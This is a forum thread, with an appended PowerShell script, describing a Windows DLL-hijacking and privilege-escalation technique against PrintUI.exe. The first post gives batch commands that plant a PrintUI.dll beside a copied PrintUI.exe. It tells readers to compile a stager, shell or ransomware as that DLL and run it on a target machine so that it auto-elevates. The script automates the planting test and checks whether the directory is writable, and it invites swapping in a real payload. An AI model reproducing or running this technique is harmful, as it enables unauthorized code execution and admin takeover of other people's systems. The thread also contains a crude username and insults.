Arbitrary code execution.

  1. #1
    Sophie Pedophile Tech Support
    Sorry for the vague title, but if I make it overly technical people's eyes will just glaze over and they'll click on another thread instead. Anyway, I currently can't access any of my Windows VMs because my server was having some technical difficulties, which are being worked on.

    Anyway, I was wondering whether PrintUI.exe still loads an arbitrary PrintUI.dll from %ProgramData% or its immediate path instead of the system directory on wanblows. Obviously at the enterprise level this will be well taken care of, but your average user doesn't know how incompetent Micrococks is.

    If it has been fixed in recent updates, that's fine, but a year ago this was still a great vector not only for arbitrary code execution but for privilege escalation as well. Micro$oft has been aware of this since 2014.

    To test, run:

    REM Stage a copy of PrintUI.exe in %ProgramData% with a planted PrintUI.dll
    REM beside it; ShUnimpl.dll (stub exports for obsolete shell functions) is harmless.
    COPY "%SystemRoot%\System32\ShUnimpl.dll" "%ProgramData%\PrintUI.dll"
    COPY "%SystemRoot%\System32\PrintUI.exe" "%ProgramData%\PrintUI.exe"
    REM Run the copy, wait for it, and decode its exit code.
    START "" /WAIT "%ProgramData%\PrintUI.exe"
    CERTUTIL.exe /ERROR %ERRORLEVEL%
    DEL "%ProgramData%\PrintUI.dll" "%ProgramData%\PrintUI.exe"

    If the new PrintUI works as intended, you have a problem. ShUnimpl.dll is supposed to get rid of obsolete shell functions by letting them error out properly and prevent any shenanigans. PrintUI.exe does not comply with this, though, and if/when it doesn't, write a stager, shell, cryptotrojan, or anything you can think of, really. Compile it for Windows as a DLL and get it to "C:\Windows\System32\Tasks_Migrated\PrintUI.dll".

    Now, on the target box, copy PrintUI.exe from %ProgramData% to the directory specified above and run it. It's going to load your malicious DLL, auto-elevate it to admin, and run your code. That's game over for the box in question.
  2. #2
    Sophie Pedophile Tech Support
    No answers, huh? I guess all I can conclude is that I am a level 97 cyber security wizard and no one is even close to my level and therefore has nothing to contribute. Which is kind of unfortunate.
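The side-by-side load test from post #1, rewritten as a PowerShell script. This is an added example, not code from the thread or from Microsoft: it stages a copy of PrintUI.exe together with a planted PrintUI.dll in a directory you choose, runs the copy once without and once with the planted DLL, and compares the two exit codes; it also checks whether the staging directory is writable by the current user, which is the precondition for the escalation post #1 describes. The PrintUITest subfolder, the parameter names, and the helper function names are my own choices; the default planted DLL is the ShUnimpl.dll stub from the post, and you can point -PlantDll at your own compiled DLL instead.

```powershell
# Added example (not from the thread): reproduce the PrintUI.exe side-by-side
# PrintUI.dll test in a staging directory and report whether the planted DLL
# changed the program's behaviour. Never touches %SystemRoot%\System32\PrintUI.dll.
param(
    # Where to stage the test. Post #1 uses %ProgramData%; the other location it
    # names is C:\Windows\System32\Tasks_Migrated. Subfolder name is my choice.
    [string]$StageDir = (Join-Path $env:ProgramData 'PrintUITest'),
    # DLL to plant as PrintUI.dll. Default is the stub library from the post;
    # pass your own compiled DLL to test a real payload.
    [string]$PlantDll = (Join-Path $env:SystemRoot 'System32\ShUnimpl.dll')
)

$ErrorActionPreference = 'Stop'
$realExe = Join-Path $env:SystemRoot 'System32\PrintUI.exe'

function Test-DirectoryWritable {
    param([string]$Path)
    # A standard user being able to drop a file next to a binary that is later
    # run with higher rights is what turns DLL hijacking into escalation.
    try {
        $probe = Join-Path $Path ([IO.Path]::GetRandomFileName())
        [IO.File]::WriteAllText($probe, '')
        Remove-Item $probe -Force
        return $true
    } catch {
        return $false
    }
}

function Invoke-StagedPrintUI {
    param([string]$Dir)
    # Run the staged copy from its own directory and wait for it. If PrintUI
    # shows a usage dialog, dismiss it; only the exit code is used.
    $p = Start-Process -FilePath (Join-Path $Dir 'PrintUI.exe') `
                       -WorkingDirectory $Dir -Wait -PassThru
    return $p.ExitCode
}

function Format-ExitCode {
    param([int]$Code)
    # Hex form (two's complement for negative NTSTATUS values) so certutil can
    # decode it, e.g. certutil -error 0xC0000139.
    $hex = '0x{0:X8}' -f $Code
    $name = (& certutil.exe -error $hex | Select-Object -First 1)
    return "$hex $name"
}

New-Item -ItemType Directory -Path $StageDir -Force | Out-Null
if (-not (Test-DirectoryWritable $StageDir)) {
    Write-Warning "$StageDir is not writable by the current user; a standard user could not plant a DLL here."
}

$stagedExe = Join-Path $StageDir 'PrintUI.exe'
$stagedDll = Join-Path $StageDir 'PrintUI.dll'
Copy-Item $realExe $stagedExe -Force

# Baseline: the copy with no PrintUI.dll beside it resolves the DLL from System32.
Remove-Item $stagedDll -Force -ErrorAction SilentlyContinue
$baseline = Invoke-StagedPrintUI $StageDir

# Plant the DLL in the application directory, which is searched before System32.
Copy-Item $PlantDll $stagedDll -Force
$withDll = Invoke-StagedPrintUI $StageDir

"baseline:               $(Format-ExitCode $baseline)"
"with planted PrintUI.dll: $(Format-ExitCode $withDll)"
if ($withDll -ne $baseline) {
    'Exit code changed: the copied PrintUI.exe picked up the side-by-side PrintUI.dll.'
} else {
    'No change: the planted DLL had no visible effect on this build.'
}

# Remove only the two files we staged, never the directory itself.
Remove-Item $stagedExe, $stagedDll -Force -ErrorAction SilentlyContinue
```

With the default stub DLL, a changed exit code or a loader error dialog that names PrintUI.dll is the signal that the copy resolved the DLL from its own directory rather than from System32. The writability warning is the part worth reading on a real box: a hijackable binary only matters for escalation if a low-privileged account can write to the directory the binary is run from.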